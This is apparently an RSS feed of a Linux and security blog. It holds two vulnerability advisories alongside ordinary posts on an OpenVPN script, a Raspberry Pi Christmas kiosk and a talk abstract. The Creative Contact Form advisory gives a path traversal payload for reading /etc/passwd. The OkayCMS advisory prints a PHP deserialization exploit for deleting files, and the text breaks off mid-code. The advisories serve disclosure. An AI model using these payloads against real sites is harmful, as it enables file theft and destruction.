FyhTech - Fun with Linux https://tech.feedyourhead.at/ en Creative Contact Form: Directory Traversal (CVE-2020-9364) https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364 <span class="field field--name-title field--type-string field--label-hidden">Creative Contact Form: Directory Traversal (CVE-2020-9364)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20200301-01<br /> Target: Creative Contact Form (for Joomla)<br /> Vendor: Creative Solutions<br /> Version: 4.6.2 (before Dec 03 2019)<br /> CVE: CVE-2020-9364<br /> Accessibility: Remote<br /> Severity: High<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h3>Summary</h3> <p>Creative Contact Form is a responsive jQuery contact form for the Joomla content-management-system.</p> <h3>Vulnerability Description</h3> <p>A directory traversal vulnerability resides inside the mailer component of the Creative Contact Form for Joomla. An attacker could exploit this vulnerability to receive any files from the server via e-mail.</p> <p><em>The vulnerable code is located in "helpers/mailer.php" at line 290:</em></p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;">&nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/is_array"><span style="color: #990000;">is_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">foreach</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'creativecontactform_upload'</span><span style="color: #009900;">&#93;</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$file</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #666666; font-style: italic;">// echo $file.'--';</span> <span style="color: #000088;">$file_path</span> <span style="color: #339933;">=</span> JPATH_BASE <span style="color: #339933;">.</span> <span style="color: #0000ff;">'/components/com_creativecontactform/views/creativeupload/files/'</span><span style="color: #339933;">.</span><span style="color: #000088;">$file</span><span style="color: #339933;">;</span> <span style="color: #000088;">$attach_files</span><span style="color: #009900;">&#91;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$file_path</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span></pre></div> <p>If an attacker puts "../../../../../../../../etc/passwd" into $_POST['creativecontactform_upload'], and enables "Send me a copy", the contact-form would send him the content of /etc/passwd via email.</p> <p><em>Note: this vulnerability might not be exploitable in the free version of Creative Contact Form since it does not allow "Send copy to sender".</em></p> <h3>Vulnerable Versions</h3> <p>Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)</p> <h3>Impact</h3> <p>An unauthenticated attacker could receive any file from the server.</p> <h3>Solution</h3> <p>Update to the current version</p> <h3>References</h3> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9364" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2020-9364</a></li> <li><a href="https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form">https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form</a> </li> </ul> <h3>Vendor Contact Timeline</h3> <table class="ce-table" height="89" width="320"> <tbody> <tr> <td>2019-12-02</td> <td>Contacting the vendor</td> </tr> <tr> <td>2019-12-02</td> <td>Vendor published a fixed version</td> </tr> <tr> <td>2019-03-01</td> <td> <p>Public disclosure</p> </td> </tr> </tbody> </table> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 09 2020</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=288&amp;2=comment&amp;3=comment" token="KATz-0qhu3m_m_g-UdRFMB2mTDlft3WPIaKRQiTlynQ"></drupal-render-placeholder> </section> Mon, 09 Mar 2020 20:59:44 +0000 Hoti 288 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364#comments https://tech.feedyourhead.at/content/creative-contact-form-directory-traversal-cve-2020-9364#comments OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN comes with example-scripts to update <em>/etc/resolv.conf</em> using "resolvconf" or systemd-resolvconf. I don't use one of them therefore I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> so that it simply changes <em>/etc/resolv.conf </em>directly. I placed a variable "IMMUTEABLE" in this script. If IMMUTEABLE is set to 1, this script will change the fileattribute of /etc/resolv.conf to immuteable. In that way it is possible to prevent other programms like dhcp-clients to change /etc/resolv.conf while openvpn is running. I know, it's a little bit hacky, but it works for me. <a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded at github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=287&amp;2=comment&amp;3=comment" token="vHuPEwt9plgjYIf1hOZjt_5xBLAxtApjH9TdXBk7p8s"></drupal-render-placeholder> </section> Thu, 26 Dec 2019 16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf#comments https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf#comments HackADay: A Christmas-Machine(Merry Christmas) https://tech.feedyourhead.at/content/hackaday-a-christmas-machine <span class="field field--name-title field--type-string field--label-hidden">HackADay: A Christmas-Machine(Merry Christmas)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I want to send you merry christmas by creating a blog-entry for a raspberry pi christmas project. The "christmas-machine" displays merry christmas and wishes for the "christkind" on a tft display for the raspberry. It is possible to send christmas wishes using a web applications that can be accessed via wifi. I placed this installation at the coffee-kitchen in the office and it was very nice to see that my colleges had a lot of fun with it.</p> <p>Blesses for "Brother Patrick" who spent me that wonderful Joy-IT TFT display.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/xmasdev.mp4" type="video/mp4" /></video> </p> <h2>Install Joy-IT TFT3.2</h2> This is a very short installation guide for this display. Please visit the documentation for this display to see the <a href="http://anleitung.joy-it.net/wp-content/uploads/2017/04/RB-TFT3.2_RB-TFT3.5_Manual.pdf">full installation guide</a>. Edit /boot/config.txt <pre><code> dtparam=spi=on dtoverlay=joy-IT-Display-Driver-32b-overlay:rotate=270,swapxy=1 </code></pre> Edit /boot/cmdline.txt and add "fbcon=map:10" <pre><code> console=serial0,115200 console=tty1 root=PARTUUID=6c586e13-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait fbcon=map:10 </code></pre> Install xorg-modules: <pre><code> apt-get install xorg xorg-docs-core xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-libinput xserver-xorg-input-wacom xserver-xorg-legacy xserver-xorg-video-all xserver-xorg-video-amdgpu xserver-xorg-video-ati xserver-xorg-video-fbdev xserver-xorg-video-fbturbo xserver-xorg-video-nouveau xserver-xorg-video-radeon xserver-xorg-video-vesa </code></pre> Edit /usr/share/X11/xorg.conf.d/99-calibration.conf: <pre><code> Section "InputClass" Identifier "calibration" MatchProduct "ADS7846 Touchscreen" Option "Calibration" "160 3723 3896 181" Option "SwapAxes" "1" Option "TransformationMatrix" "1 0 0 0 -1 1 0 0 1" EndSection </code></pre> Edit /usr/share/X11/xorg.conf.d/99-fbturbo.conf and set fbdev to "/dev/fb1" <pre><code> Section "Device" Identifier "Allwinner A10/A13 FBDEV" Driver "fbturbo" Option "fbdev" "/dev/fb1" Option "SwapbuffersWait" "true" EndSection </code></pre> Install the driver: <pre><code> cd /tmp wget anleitung.joy-it.net/upload/joy-IT-Display-Driver-32b-overlay.dtbsudo cp joy-IT-Display-Driver-32b-overlay.dtb /boot/overlays/joy-IT-Display-Driver-32b-overlay.dtbo </code></pre> <h2>Prepare the desktop environment</h2> Install the LXDE-desktop: <pre><code> apt-get install lxde-common lxde-core lxde-icon-theme lxde-settings-daemon openbox-lxde-session lightdm lightdm-gtk-greeter chromium-browser unclutter </code></pre> Set autologin for user pi in lightdm: <pre><code> autologin-guest=false autologin-user=pi autologin-user-timeout=0 </code></pre> Edit /etc/xdg/lxsession/LXDE/autostart and remove xscreensaver: <pre><code> @lxpanel --profile LXDE @pcmanfm --desktop --profile LXDE @xset s off @xset -dpms @xset s noblank </code></pre> <b>Reboot</b> Edit /home/pi/.config/lxsession/LXDE/autostart: <pre><code> @lxpanel --profile LXDE @pcmanfm --desktop --profile LXDE @/home/pi/startxmas.sh @xset s off @xset -dpms @xset s noblank </code></pre> Remove software: <pre><code> apt-get remove light-locker wpasupplicant </code></pre> Edit /home/pi/startxmas.sh: <pre><code> #!/bin/bash DISPLAY=:0.0 unclutter & DISPLAY=:0.0 chromium-browser --kiosk --disable-restore-session-state --disable-features=TranslateUI --disable-session-crashed-bubble http://localhost/tree.html </code></pre> <h2>Install the Access-Point</h2> <pre><code> apt-get install hostapd dnsmasq </code></pre> Edit /etc/hostapd/hostapd.conf: <pre><code> interface=wlan0 driver=nl80211 ssid=xmas hw_mode=g channel=11 macaddr_acl=0 </code></pre> Edit /etc/dhcpcd.conf and add the following lines at the end of the file: <pre><code> interface wlan0 static ip_address=10.0.0.1/24 </code></pre> Edit /etc/dnsmasq.d/dhcp: <pre><code> dhcp-authoritative dhcp-range=10.0.0.50,10.0.0.150,12h address=/\#/10.0.0.1 interface=wlan0 </code></pre> Edit /etc/default/hostapd and modify DAEMON_CONF: <pre><code> DAEMON_CONF="/etc/hostapd/hostapd.conf" </code></pre> Configure autostart for hostapd: <pre><code> systemctl daemon-reload systemctl unmask hostapd systemctl enable hostapd </code></pre> <h2>Configure the webservice</h2> <pre><code> apt-get install apache2 php7.3 php7.3-cli php7.3-json git </code></pre> Download the Webfiles: <pre><code> git clone https://github.com/whotwagner/xmas2019.git /tmp/xmas2019 cp -r /tmp/xmas2019/* /var/www/html/ chown www-data /var/www/html/wishes </code></pre> </b>Reboot</b> <h2>MERRY CHRISTMAS AND A HAPPY NEW YEAR 2020</h2> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 21 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/xmas" hreflang="en">xmas</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Fun" hreflang="en">Fun</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=286&amp;2=comment&amp;3=comment" token="bOpcwG6QkMNce10GTTONTe1gk3UOW4gOFZ8auDQ32WI"></drupal-render-placeholder> </section> Sat, 21 Dec 2019 20:28:14 +0000 Hoti 286 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/hackaday-a-christmas-machine#comments https://tech.feedyourhead.at/content/hackaday-a-christmas-machine#comments BSides 2019: Code diving for pop chains https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains <span class="field field--name-title field--type-string field--label-hidden">BSides 2019: Code diving for pop chains</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="bsides vienna 2019 talk" data-entity-type="file" data-entity-uuid="f551b7b1-0611-4457-9ed1-c6af5193e0d8" height="691" src="/sites/default/files/inline-images/php_object_injection.jpg" width="1460" /></p> <p>I gave a talk at the <a href="https://bsidesvienna.at/">BSides 2019 Vienna</a> about PHP Object Injection. Here is the abstract of this talk:</p> <blockquote> <p>PHP Object Injection is a well known web vulnerability that could allow an attacker to perform different kinds of attacks by reusing and chaining existing code of the application(gadgets). Sometimes it is easier to find the vulnerability than discovering a proper chain for a remote code execution. This talk illustrates the long road of searching for various "POP chains" by disclosing details of a vulnerability for Okay-CMS. The code of the application will be analyzed and possible payloads will be discussed. A working unauthenticated remote code execution exploit will finally proof the concept.</p> </blockquote> <p>The slides can be downloaded here: <a href="/sites/default/files/DateiUploads/Code_Diving_for_Pop_Chains.pdf">Slides</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 11 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=285&amp;2=comment&amp;3=comment" token="2u7SucTKw6beg7-jglaabpQ2pYPLrK1hHgXNp7Lh618"></drupal-render-placeholder> </section> Wed, 11 Dec 2019 12:41:54 +0000 Hoti 285 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains#comments https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains#comments OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content managment system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in “<em>view/ProductsView.php</em>” using the cookie "price_filter" or in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$items</span> <span style="color: #339933;">=</span> <span style="color: #339933;">!</span><a href="http://www.php.net/empty"><span style="color: #990000;">empty</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> ? <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <a href="http://www.php.net/array"><span style="color: #990000;">array</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$price_filter</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'price_filter'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <h4>Proof of Concept</h4> <p>The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: #990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: 